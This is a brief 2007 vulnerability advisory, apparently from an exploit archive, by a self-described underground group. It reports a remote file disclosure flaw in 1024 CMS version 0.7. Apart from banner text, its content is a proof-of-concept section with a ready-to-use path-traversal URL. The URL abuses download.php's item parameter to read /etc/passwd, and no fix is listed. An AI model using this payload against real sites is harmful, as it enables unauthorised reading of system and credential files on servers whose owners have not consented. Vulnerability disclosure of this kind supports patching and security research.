1024 CMS 0.7 (download.php item) Remote File Disclosure Vulnerability

2007-05-02 00:00:00

\#'#/
(-.-)
--------------------oOO---(_)---OOo-------------------
| [ Y! Underground Group ] |
| [ www.dj7xpl.2600.ir ] |
| [ Dj7xpl @ 2600.ir ] |
------------------------------------------------------


<--------------------------------------------------------------------------------------------------------------------->

[!] Portal : 1024 CMS Version 0.7
[!] Vendor : http://www.treble.lfhost.com
[!] Author : Dj7xpl
[!] Type : Remote File Disclosure Vuln
[!] We Are : Y4Ho0 -Mr.Mithridates -Sir SiSiLi -System Failure -Satanic Soulfull -And Me

<--------------------------------------------------------------------------------------------------------------------->

<--------------------------------------------------------------------------------------------------------------------->

PoC :

http://[Target]/[Path]/includes/download.php?item=../uploads/[File]
http://Target.com/1024/includes/download.php?item=../uploads/../../../../../etc/passwd

<--------------------------------------------------------------------------------------------------------------------->

#

Fixes

No fixes

In order to submit a new fix you need to be registered.